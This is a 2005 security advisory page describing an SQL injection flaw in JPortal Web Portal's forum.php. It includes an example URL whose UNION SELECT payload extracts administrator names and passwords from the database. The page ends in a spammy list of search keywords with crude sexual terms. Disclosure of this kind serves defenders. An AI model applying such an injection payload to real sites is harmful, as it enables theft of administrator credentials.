about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , JPortal Forum Forum.PHP SQL Injection Vulnerability


Title JPortal Forum Forum.PHP SQL Injection Vulnerability
Published 2005-12-19-12:00AM
Updated 2005-12-19-05:08PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Zbigniew (fQ) Czarnecki is credited with the discovery of this vulnerability.
Vulnerable  JPortal Web Portal 2.3
JPortal Web Portal 2.2.1
Not Vulnerable  
Code   No exploit is required.

An example URI has been provided:

http://www.example.com/jportal/forum.php?cmd=search&word=Trey&where=author%20and%201=0%20union%20select%20null,null,nick,pass,null,
null,null,null,null,null,null,null,null,null,null,null%20from%20admins%20/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 10 Jan 2009 04:14:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
penis suck henrique i Datig instructio Covergirls sexe.55 com video Sexy ass sex se Ww sxs Php-Nuke e hotmai banbus ?1 compone Thrishabat wwwxnxx Toplessgir php-nuke 2 www.dimane 3sa www.pink_w sexy walp jenna jami Lagi asik news for c sexy boy 2.6.0 ti ft brit gog123 3GP sex squery/lib squery/lib Www.azhar php-nuke 2 Wap.phonee squery/lib Video xxx squery/lib squery/lib squery/lib free downl www.wen1we Www.snuffx malika shi squery/lib squery/lib 200 /compo cartounsex Moto Gp3 Vidio sex